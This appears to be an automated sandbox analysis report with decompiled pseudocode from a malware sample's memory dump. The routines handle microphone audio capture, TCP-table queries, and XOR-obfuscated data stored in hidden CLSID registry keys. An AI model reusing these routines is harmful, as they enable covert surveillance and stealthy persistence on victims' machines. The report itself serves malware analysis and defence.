                                                                                              					if(__eflags != 0) {
                                                                                              						_t22 = E0425DB90(_t39, __eflags);
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						_t22 = E0425D980(_t58, _t67);
                                                                                              						_a8 = _t22;
                                                                                              						__eflags = _t22;
                                                                                              						if(_t22 == 0) {
                                                                                              							goto L10;
                                                                                              						} else {
                                                                                              							_t16 = LocalSize(_t22) + 1; // 0x1
                                                                                              							_t41 = LocalAlloc(0x40, _t16);
                                                                                              							_t70 = _a8;
                                                                                              							_t18 = _t41 + 1; // 0x1
                                                                                              							_t48 = _t18;
                                                                                              							 *_t41 = 0x8e;
                                                                                              							E0427E060(_t48, _t70, _t23);
                                                                                              							LocalFree(_t70);
                                                                                              							_t27 = LocalSize(_t41);
                                                                                              							_push(_t48);
                                                                                              							_push(0x3f);
                                                                                              							_push(_t27);
                                                                                              							_push(_t41);
                                                                                              							E04251C60( *((intOrPtr*)(_v8 + 4)));
                                                                                              							return LocalFree(_t41);
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t22 = E0425D570(_t58, _t67);
                                                                                              					_a8 = _t22;
                                                                                              					if(_t22 == 0) {
                                                                                              						L10:
                                                                                              						return _t22;
                                                                                              					} else {
                                                                                              						_t10 = LocalSize(_t22) + 1; // 0x1
                                                                                              						_t43 = LocalAlloc(0x40, _t10);
                                                                                              						_t74 = _a8;
                                                                                              						_t12 = _t43 + 1; // 0x1
                                                                                              						_t52 = _t12;
                                                                                              						 *_t43 = 0x8e;
                                                                                              						E0427E060(_t52, _t74, _t30);
                                                                                              						LocalFree(_t74);
                                                                                              						_t34 = LocalSize(_t43);
                                                                                              						_push(_t52);
                                                                                              						_push(0x3f);
                                                                                              						_push(_t34);
                                                                                              						_push(_t43);
                                                                                              						E04251C60( *((intOrPtr*)(_v8 + 4)));
                                                                                              						return LocalFree(_t43);
                                                                                              					}
                                                                                              				}
                                                                                              			}























                                                                                              0x0425df13
                                                                                              0x0425df15
                                                                                              0x0425df17
                                                                                              0x0425df1a
                                                                                              0x0425df1c
                                                                                              0x0425df21
                                                                                              0x0425df2a
                                                                                              0x0425df2d
                                                                                              0x0425df30
                                                                                              0x0425df3b
                                                                                              0x0425df40
                                                                                              0x0425df43
                                                                                              0x0425df46
                                                                                              0x0425df46
                                                                                              0x0425df30
                                                                                              0x0425df4d
                                                                                              0x0425df53
                                                                                              0x0425df59
                                                                                              0x0425dfc0
                                                                                              0x0425dfc3
                                                                                              0x0425e028
                                                                                              0x00000000
                                                                                              0x0425dfc5
                                                                                              0x0425dfc5
                                                                                              0x0425dfca
                                                                                              0x0425dfcd
                                                                                              0x0425dfcf
                                                                                              0x00000000
                                                                                              0x0425dfd1
                                                                                              0x0425dfdc
                                                                                              0x0425dfe8
                                                                                              0x0425dfeb
                                                                                              0x0425dfef
                                                                                              0x0425dfef
                                                                                              0x0425dff2
                                                                                              0x0425dff6
                                                                                              0x0425e005
                                                                                              0x0425e008
                                                                                              0x0425e00a
                                                                                              0x0425e00e
                                                                                              0x0425e010
                                                                                              0x0425e011
                                                                                              0x0425e015
                                                                                              0x0425e023
                                                                                              0x0425e023
                                                                                              0x0425dfcf
                                                                                              0x0425df5b
                                                                                              0x0425df5b
                                                                                              0x0425df60
                                                                                              0x0425df65
                                                                                              0x0425e02d
                                                                                              0x0425e033
                                                                                              0x0425df6b
                                                                                              0x0425df76
                                                                                              0x0425df82
                                                                                              0x0425df85
                                                                                              0x0425df89
                                                                                              0x0425df89
                                                                                              0x0425df8c
                                                                                              0x0425df90
                                                                                              0x0425df9f
                                                                                              0x0425dfa2
                                                                                              0x0425dfa4
                                                                                              0x0425dfa8
                                                                                              0x0425dfaa
                                                                                              0x0425dfab
                                                                                              0x0425dfaf
                                                                                              0x0425dfbd
                                                                                              0x0425dfbd
                                                                                              0x0425df65

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000064,?,?,?,?,?,0425D48F,?,?), ref: 0425DF4D
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DF72
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0425D48F,?,?), ref: 0425DF7C
                                                                                              • LocalFree.KERNEL32(?), ref: 0425DF9F
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DFA2
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0425DFB5
                                                                                                • Part of subcall function 0425DE60: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 0425DE80
                                                                                                • Part of subcall function 0425DE60: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 0425DE9B
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DFD8
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0425D48F,?,?), ref: 0425DFE2
                                                                                              • LocalFree.KERNEL32(?), ref: 0425E005
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425E008
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0425E01B
                                                                                                • Part of subcall function 0425DB90: LocalAlloc.KERNEL32(00000040,74CF5A91,00000000,?,?), ref: 0425DBDE
                                                                                                • Part of subcall function 0425DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0425DC00
                                                                                                • Part of subcall function 0425DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0425DC1E
                                                                                                • Part of subcall function 0425DB90: LocalSize.KERNEL32(00000000), ref: 0425DC25
                                                                                                • Part of subcall function 0425DB90: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 0425DC3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$Free$Size$Alloc$Table$Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 1439515551-0
                                                                                              • Opcode ID: 4433cc308e55a052d1004e005a1a79486c13eceb2219137e6e677ab8e68d1dad
                                                                                              • Instruction ID: 9b3c4fb5580bc5922a5b46e0ca31b98bfbca47ea05e70aee0bf88ba53014392b
                                                                                              • Opcode Fuzzy Hash: 4433cc308e55a052d1004e005a1a79486c13eceb2219137e6e677ab8e68d1dad
                                                                                              • Instruction Fuzzy Hash: FD311A76B102156BD720AFB8EC40D6BF79DEF59220B118159FD09A7251DA31FD01CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E04251280(intOrPtr* __ecx) {
                                                                                              				void* _t38;
                                                                                              				void* _t39;
                                                                                              				void* _t40;
                                                                                              				intOrPtr* _t42;
                                                                                              				intOrPtr* _t43;
                                                                                              				struct wavehdr_tag** _t45;
                                                                                              				struct wavehdr_tag** _t46;
                                                                                              				void* _t47;
                                                                                              
                                                                                              				_t42 = __ecx;
                                                                                              				 *__ecx = 0x429c5cc;
                                                                                              				if( *((char*)(__ecx + 0x44)) != 0) {
                                                                                              					waveInStop( *(__ecx + 0x18));
                                                                                              					waveInReset( *(__ecx + 0x18));
                                                                                              					_t46 = __ecx + 0x30;
                                                                                              					_t40 = 2;
                                                                                              					do {
                                                                                              						waveInUnprepareHeader( *(__ecx + 0x18),  *_t46, 0x20);
                                                                                              						_t46 =  &(_t46[1]);
                                                                                              						_t40 = _t40 - 1;
                                                                                              					} while (_t40 != 0);
                                                                                              					waveInClose( *(__ecx + 0x18));
                                                                                              					TerminateThread( *(__ecx + 0x2c), 0xffffffff);
                                                                                              				}
                                                                                              				if( *((char*)(_t42 + 0x45)) != 0) {
                                                                                              					waveOutReset( *(_t42 + 0x40));
                                                                                              					_t45 = _t42 + 0x30;
                                                                                              					_t39 = 2;
                                                                                              					do {
                                                                                              						waveOutUnprepareHeader( *(_t42 + 0x40),  *_t45, 0x20);
                                                                                              						_t45 =  &(_t45[1]);
                                                                                              						_t39 = _t39 - 1;
                                                                                              					} while (_t39 != 0);
                                                                                              					waveOutClose( *(_t42 + 0x40));
                                                                                              				}
                                                                                              				_t43 = _t42 + 0x30;
                                                                                              				_t38 = 2;
                                                                                              				do {
                                                                                              					E04275B0F( *((intOrPtr*)(_t43 - 0x28)));
                                                                                              					_push(0x20);
                                                                                              					E04275B47( *_t43);
                                                                                              					E04275B0F( *((intOrPtr*)(_t43 - 0x20)));
                                                                                              					_push(0x20);
                                                                                              					E04275B47( *((intOrPtr*)(_t43 + 8)));
                                                                                              					_t47 = _t47 + 0x18;
                                                                                              					_t43 = _t43 + 4;
                                                                                              					_t38 = _t38 - 1;
                                                                                              				} while (_t38 != 0);
                                                                                              				CloseHandle( *(_t42 + 0x24));
                                                                                              				CloseHandle( *(_t42 + 0x28));
                                                                                              				return CloseHandle( *(_t42 + 0x2c));
                                                                                              			}











                                                                                              0x04251283
                                                                                              0x04251289
                                                                                              0x0425128f
                                                                                              0x04251294
                                                                                              0x0425129d
                                                                                              0x042512a3
                                                                                              0x042512a6
                                                                                              0x042512b0
                                                                                              0x042512b7
                                                                                              0x042512bd
                                                                                              0x042512c0
                                                                                              0x042512c0
                                                                                              0x042512c8
                                                                                              0x042512d3
                                                                                              0x042512d3
                                                                                              0x042512dd
                                                                                              0x042512e2
                                                                                              0x042512e8
                                                                                              0x042512eb
                                                                                              0x042512f0
                                                                                              0x042512f7
                                                                                              0x042512fd
                                                                                              0x04251300
                                                                                              0x04251300
                                                                                              0x04251308
                                                                                              0x04251308
                                                                                              0x0425130e
                                                                                              0x04251311
                                                                                              0x04251316
                                                                                              0x04251319
                                                                                              0x0425131e
                                                                                              0x04251322
                                                                                              0x0425132a
                                                                                              0x0425132f
                                                                                              0x04251334
                                                                                              0x04251339
                                                                                              0x0425133c
                                                                                              0x0425133f
                                                                                              0x0425133f
                                                                                              0x0425134d
                                                                                              0x04251352
                                                                                              0x0425135c

                                                                                              APIs
                                                                                              • waveInStop.WINMM(?), ref: 04251294
                                                                                              • waveInReset.WINMM(?), ref: 0425129D
                                                                                              • waveInUnprepareHeader.WINMM(?,?,00000020), ref: 042512B7
                                                                                              • waveInClose.WINMM(?), ref: 042512C8
                                                                                              • TerminateThread.KERNEL32(?,000000FF), ref: 042512D3
                                                                                              • waveOutReset.WINMM(?), ref: 042512E2
                                                                                              • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 042512F7
                                                                                              • waveOutClose.WINMM(?), ref: 04251308
                                                                                              • CloseHandle.KERNEL32(?), ref: 0425134D
                                                                                              • CloseHandle.KERNEL32(?), ref: 04251352
                                                                                              • CloseHandle.KERNEL32(?), ref: 04251357
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wave$Close$Handle$HeaderResetUnprepare$StopTerminateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1104916709-0
                                                                                              • Opcode ID: dc29289e4a01700acdcebfd8ec6508aa98082b5536bb6433a86b6cca6d87e685
                                                                                              • Instruction ID: 98009ab12ec0b78cf6c8a8cf38be2c0a160091a2646de57536923826e5c59d09
                                                                                              • Opcode Fuzzy Hash: dc29289e4a01700acdcebfd8ec6508aa98082b5536bb6433a86b6cca6d87e685
                                                                                              • Instruction Fuzzy Hash: AB21D432A14622BFDB226F69ED08B18BB71FF18355F404125EA4562971CB36BC76DF80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E0425E880(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				short _v1128;
                                                                                              				void* _v1132;
                                                                                              				char _v1136;
                                                                                              				int* _v1140;
                                                                                              				int _v1144;
                                                                                              				void* _v1148;
                                                                                              				int _v1152;
                                                                                              				int _v1156;
                                                                                              				void* __ebp;
                                                                                              				signed int _t49;
                                                                                              				int* _t57;
                                                                                              				void* _t72;
                                                                                              				void* _t74;
                                                                                              				void* _t75;
                                                                                              				int _t84;
                                                                                              				signed int* _t85;
                                                                                              				signed int* _t89;
                                                                                              				char _t93;
                                                                                              				int* _t95;
                                                                                              				char _t96;
                                                                                              				int* _t98;
                                                                                              				signed int* _t99;
                                                                                              				signed int _t101;
                                                                                              				void* _t102;
                                                                                              				void* _t103;
                                                                                              				void* _t104;
                                                                                              				signed int _t117;
                                                                                              
                                                                                              				_t49 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t49 ^ _t101;
                                                                                              				_t95 = 0;
                                                                                              				_t85 = L"Pg";
                                                                                              				_v1140 = 0;
                                                                                              				E04266050(__ebx, _t85,  &_v88, 0, __esi);
                                                                                              				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				_t103 = _t102 + 0xc;
                                                                                              				_t84 = 0;
                                                                                              				_t57 = RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20119,  &_v1132);
                                                                                              				if(_t57 == 0) {
                                                                                              					_v1144 = 0x104;
                                                                                              					if(RegEnumKeyExW(_v1132, 0,  &_v608,  &_v1144, _t57, _t57, _t57, _t57) == 0) {
                                                                                              						_push(__esi);
                                                                                              						do {
                                                                                              							_t84 = _t84 + 1;
                                                                                              							if(_v1144 == 0x10) {
                                                                                              								_v1152 = 4;
                                                                                              								_t98 = 0;
                                                                                              								_v1136 = 0;
                                                                                              								_v1148 = 0;
                                                                                              								if(RegOpenKeyExW(_v1132,  &_v608, 0, 0x20119,  &_v1148) != 0) {
                                                                                              									L8:
                                                                                              									_t96 = 1;
                                                                                              								} else {
                                                                                              									if(RegQueryValueExW(_v1148, "2", 0,  &_v1156,  &_v1136,  &_v1152) == 0) {
                                                                                              										_t98 =  ==  ? 1 : 0;
                                                                                              									}
                                                                                              									RegCloseKey(_v1148);
                                                                                              									_t96 = _v1136;
                                                                                              									if(_t98 == 0) {
                                                                                              										goto L8;
                                                                                              									}
                                                                                              								}
                                                                                              								_push(_t85);
                                                                                              								_v1136 = 0;
                                                                                              								_t85 = _v1132;
                                                                                              								_t99 = E04260C60(_t85,  &_v608, _t85,  &_v1136);
                                                                                              								_t103 = _t103 + 0xc;
                                                                                              								if(_t99 == 0) {
                                                                                              									_t95 = _v1140;
                                                                                              								} else {
                                                                                              									_t93 = _v1136;
                                                                                              									if(_t93 > 1) {
                                                                                              										_t31 = _t93 - 1; // -1
                                                                                              										_t74 = _t31;
                                                                                              										 *(_t74 + _t99) =  *(_t74 + _t99) ^  *_t99;
                                                                                              										_t75 = _t74 - 1;
                                                                                              										while(_t75 != 0) {
                                                                                              											 *(_t75 + _t99) =  *(_t75 + _t99) ^  *(_t75 +  &(_t99[0]));
                                                                                              											_t75 = _t75 - 1;
                                                                                              										}
                                                                                              										_t89 = _t75 + _t99;
                                                                                              										 *_t89 =  *_t89 ^ _t89[0];
                                                                                              										_t117 =  *_t89;
                                                                                              									}
                                                                                              									_t85 = _t99;
                                                                                              									_t72 = E0425F050(_t84, _t93, _t96, _t99, _t117, 1, _t96);
                                                                                              									_t95 = _v1140;
                                                                                              									_t104 = _t103 + 8;
                                                                                              									if(_t72 != 0) {
                                                                                              										_v1140 = _t95;
                                                                                              									}
                                                                                              									E04275B0F(_t99);
                                                                                              									_t103 = _t104 + 4;
                                                                                              								}
                                                                                              							}
                                                                                              							_v1144 = 0x104;
                                                                                              						} while (RegEnumKeyExW(_v1132, _t84,  &_v608,  &_v1144, 0, 0, 0, 0) == 0);
                                                                                              					}
                                                                                              					RegCloseKey(_v1132);
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t101);
                                                                                              			}

































                                                                                              0x0425e889
                                                                                              0x0425e890
                                                                                              0x0425e895
                                                                                              0x0425e89a
                                                                                              0x0425e89f
                                                                                              0x0425e8a5
                                                                                              0x0425e8ba
                                                                                              0x0425e8c0
                                                                                              0x0425e8c9
                                                                                              0x0425e8de
                                                                                              0x0425e8e6
                                                                                              0x0425e8f6
                                                                                              0x0425e917
                                                                                              0x0425e91d
                                                                                              0x0425e920
                                                                                              0x0425e920
                                                                                              0x0425e928
                                                                                              0x0425e934
                                                                                              0x0425e944
                                                                                              0x0425e954
                                                                                              0x0425e95a
                                                                                              0x0425e968
                                                                                              0x0425e9ba
                                                                                              0x0425e9ba
                                                                                              0x0425e96a
                                                                                              0x0425e993
                                                                                              0x0425e9a1
                                                                                              0x0425e9a1
                                                                                              0x0425e9aa
                                                                                              0x0425e9b0
                                                                                              0x0425e9b8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425e9b8
                                                                                              0x0425e9bf
                                                                                              0x0425e9c6
                                                                                              0x0425e9d2
                                                                                              0x0425e9e3
                                                                                              0x0425e9e5
                                                                                              0x0425e9ea
                                                                                              0x0425ea41
                                                                                              0x0425e9ec
                                                                                              0x0425e9ec
                                                                                              0x0425e9f5
                                                                                              0x0425e9f9
                                                                                              0x0425e9f9
                                                                                              0x0425e9fc
                                                                                              0x0425e9ff
                                                                                              0x0425ea02
                                                                                              0x0425ea08
                                                                                              0x0425ea0b
                                                                                              0x0425ea0b
                                                                                              0x0425ea10
                                                                                              0x0425ea16
                                                                                              0x0425ea16
                                                                                              0x0425ea16
                                                                                              0x0425ea1b
                                                                                              0x0425ea1d
                                                                                              0x0425ea22
                                                                                              0x0425ea28
                                                                                              0x0425ea2d
                                                                                              0x0425ea30
                                                                                              0x0425ea30
                                                                                              0x0425ea37
                                                                                              0x0425ea3c
                                                                                              0x0425ea3c
                                                                                              0x0425e9ea
                                                                                              0x0425ea55
                                                                                              0x0425ea74
                                                                                              0x0425ea7c
                                                                                              0x0425ea83
                                                                                              0x0425ea83
                                                                                              0x0425ea9a

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 0425E8BA
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0425E8DE
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0425E90F
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,74CB43E0), ref: 0425E960
                                                                                              • RegQueryValueExW.ADVAPI32(?,0429E124,00000000,?,?,00000004), ref: 0425E98B
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0425E9AA
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000,74CB43E0), ref: 0425EA6E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0425EA83
                                                                                              Strings
                                                                                              • SOFTWARE\Classes\CLSID\%s, xrefs: 0425E8B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$EnumQueryValue$wsprintf
                                                                                              • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 617139280-1183003970
                                                                                              • Opcode ID: ec9b2efc538fc10afa3097efbb7a90f369640bf9fce1d19ba0cf3e3e93d6ff41
                                                                                              • Instruction ID: 6c024a5c0434d79c6e19550eb9aac5c8db49e93ebf9b8cd98c3d5efda3f00e25
                                                                                              • Opcode Fuzzy Hash: ec9b2efc538fc10afa3097efbb7a90f369640bf9fce1d19ba0cf3e3e93d6ff41
                                                                                              • Instruction Fuzzy Hash: A45183F1A14128ABEB308F60DC44BAAB77CEF45304F1101D9EA49E7151EB71AE85CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E0425EAA0(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				char _v616;
                                                                                              				signed int _t34;
                                                                                              				int _t64;
                                                                                              				void* _t78;
                                                                                              				void* _t79;
                                                                                              				char* _t85;
                                                                                              				signed int _t86;
                                                                                              
                                                                                              				_t34 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t34 ^ _t86;
                                                                                              				_t64 = __edx;
                                                                                              				_t85 = __ecx;
                                                                                              				if(__edx >= 0x5c) {
                                                                                              					if(__edx !=  *((intOrPtr*)(__ecx + 0x1c)) + 0x5c +  *((intOrPtr*)(__ecx + 0x24)) +  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                              						goto L1;
                                                                                              					} else {
                                                                                              						_push(__edi);
                                                                                              						E04266050(__edx, L"Pg",  &_v88, __edi, __ecx);
                                                                                              						wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, __ecx + 0x28);
                                                                                              						E042654D0(_t85, _t64);
                                                                                              						_v616 = 1;
                                                                                              						_v612 = 0;
                                                                                              						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
                                                                                              							RegSetValueExW(_v612, "2", 0, 4,  &_v616, 4);
                                                                                              							RegCloseKey(_v612);
                                                                                              						}
                                                                                              						_v612 = 0;
                                                                                              						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
                                                                                              							RegSetValueExW(_v612, "1", 0, 3, _t85, _t64);
                                                                                              							asm("sbb edi, edi");
                                                                                              							RegCloseKey(_v612);
                                                                                              						}
                                                                                              						if(_t64 > 1) {
                                                                                              							_t78 = _t64 - 1;
                                                                                              							 *(_t78 + _t85) =  *(_t78 + _t85) ^  *_t85;
                                                                                              							_t79 = _t78 - 1;
                                                                                              							while(_t79 != 0) {
                                                                                              								 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
                                                                                              								_t79 = _t79 - 1;
                                                                                              							}
                                                                                              							 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
                                                                                              						}
                                                                                              						return E04275AFE(_v8 ^ _t86);
                                                                                              					}
                                                                                              				} else {
                                                                                              					L1:
                                                                                              					return E04275AFE(_v8 ^ _t86);
                                                                                              				}
                                                                                              			}














                                                                                              0x0425eaa9
                                                                                              0x0425eab0
                                                                                              0x0425eab4
                                                                                              0x0425eab7
                                                                                              0x0425eabc
                                                                                              0x0425eae0
                                                                                              0x00000000
                                                                                              0x0425eae2
                                                                                              0x0425eae2
                                                                                              0x0425eaeb
                                                                                              0x0425eb04
                                                                                              0x0425eb11
                                                                                              0x0425eb1e
                                                                                              0x0425eb3c
                                                                                              0x0425eb5a
                                                                                              0x0425eb74
                                                                                              0x0425eb7c
                                                                                              0x0425eb7c
                                                                                              0x0425eb8a
                                                                                              0x0425ebb6
                                                                                              0x0425ebcd
                                                                                              0x0425ebd7
                                                                                              0x0425ebda
                                                                                              0x0425ebda
                                                                                              0x0425ebe3
                                                                                              0x0425ebe7
                                                                                              0x0425ebea
                                                                                              0x0425ebed
                                                                                              0x0425ebf0
                                                                                              0x0425ebf6
                                                                                              0x0425ebf9
                                                                                              0x0425ebf9
                                                                                              0x0425ec02
                                                                                              0x0425ec02
                                                                                              0x0425ec17
                                                                                              0x0425ec17
                                                                                              0x0425eabf
                                                                                              0x0425eabf
                                                                                              0x0425eacf
                                                                                              0x0425eacf

                                                                                              APIs
                                                                                              • wsprintfW.USER32 ref: 0425EB04
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 0425EB4C
                                                                                              • RegSetValueExW.ADVAPI32(00000000,0429E124,00000000,00000004,00000001,00000004), ref: 0425EB74
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0425EB7C
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,00000000,00000000), ref: 0425EBAE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$CloseValuewsprintf
                                                                                              • String ID: SOFTWARE\Classes\CLSID\%s\%s$\
                                                                                              • API String ID: 1643814758-3376016971
                                                                                              • Opcode ID: 4e9623a9a485ca220ecb457027207024845a6888efc5bf298e32fc99cf06ba45
                                                                                              • Instruction ID: c79ec310a25d8ad44d7433a1d06bbaa1e1065a78a4f7d7a368501d30a55f1990
                                                                                              • Opcode Fuzzy Hash: 4e9623a9a485ca220ecb457027207024845a6888efc5bf298e32fc99cf06ba45
                                                                                              • Instruction Fuzzy Hash: 7941E931714318ABEB30DF68DC89FAAB7B9FB44704F504199E906AA1C1DA72BE44CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E0425E700(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v92;
                                                                                              				short _v612;
                                                                                              				short _v1132;
                                                                                              				int _v1136;
                                                                                              				void* _v1140;
                                                                                              				void* _v1144;
                                                                                              				char _v1148;
                                                                                              				signed int _t27;
                                                                                              				int* _t35;
                                                                                              				char _t54;
                                                                                              				int _t65;
                                                                                              				signed int _t66;
                                                                                              
                                                                                              				_t27 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t27 ^ _t66;
                                                                                              				_t54 = __ecx;
                                                                                              				E04266050(__ecx, L"Pg",  &_v92, __edi, __esi);
                                                                                              				wsprintfW( &_v1132, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v92);
                                                                                              				_t65 = 0;
                                                                                              				_t35 = RegOpenKeyExW(0x80000002,  &_v1132, 0, 0x20119,  &_v1140);
                                                                                              				if(_t35 != 0) {
                                                                                              					L8:
                                                                                              					if(_t54 == 0) {
                                                                                              						E0425E660();
                                                                                              						return E04275AFE(_v8 ^ _t66);
                                                                                              					} else {
                                                                                              						E0425E5F0();
                                                                                              						return E04275AFE(_v8 ^ _t66);
                                                                                              					}
                                                                                              				}
                                                                                              				_v1136 = 0x104;
                                                                                              				if(RegEnumKeyExW(_v1140, 0,  &_v612,  &_v1136, _t35, _t35, _t35, _t35) != 0) {
                                                                                              					L7:
                                                                                              					RegCloseKey(_v1140);
                                                                                              					goto L8;
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t65 = _t65 + 1;
                                                                                              						if(_v1136 == 0x10) {
                                                                                              							_v1148 = _t54;
                                                                                              							_v1144 = 0;
                                                                                              							if(RegCreateKeyExW(_v1140,  &_v612, 0, 0, 0, 0x20106, 0,  &_v1144, 0) == 0) {
                                                                                              								RegSetValueExW(_v1144, "2", 0, 4,  &_v1148, 4);
                                                                                              								RegCloseKey(_v1144);
                                                                                              							}
                                                                                              						}
                                                                                              						_v1136 = 0x104;
                                                                                              					} while (RegEnumKeyExW(_v1140, _t65,  &_v612,  &_v1136, 0, 0, 0, 0) == 0);
                                                                                              					goto L7;
                                                                                              				}
                                                                                              			}
















                                                                                              0x0425e709
                                                                                              0x0425e710
                                                                                              0x0425e715
                                                                                              0x0425e720
                                                                                              0x0425e735
                                                                                              0x0425e744
                                                                                              0x0425e759
                                                                                              0x0425e761
                                                                                              0x0425e84a
                                                                                              0x0425e84c
                                                                                              0x0425e864
                                                                                              0x0425e879
                                                                                              0x0425e84e
                                                                                              0x0425e84e
                                                                                              0x0425e863
                                                                                              0x0425e863
                                                                                              0x0425e84c
                                                                                              0x0425e771
                                                                                              0x0425e798
                                                                                              0x0425e842
                                                                                              0x0425e848
                                                                                              0x00000000
                                                                                              0x0425e7a0
                                                                                              0x0425e7a0
                                                                                              0x0425e7a0
                                                                                              0x0425e7a8
                                                                                              0x0425e7b2
                                                                                              0x0425e7cc
                                                                                              0x0425e7e5
                                                                                              0x0425e7ff
                                                                                              0x0425e80b
                                                                                              0x0425e80b
                                                                                              0x0425e7e5
                                                                                              0x0425e81b
                                                                                              0x0425e83a
                                                                                              0x00000000
                                                                                              0x0425e7a0

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
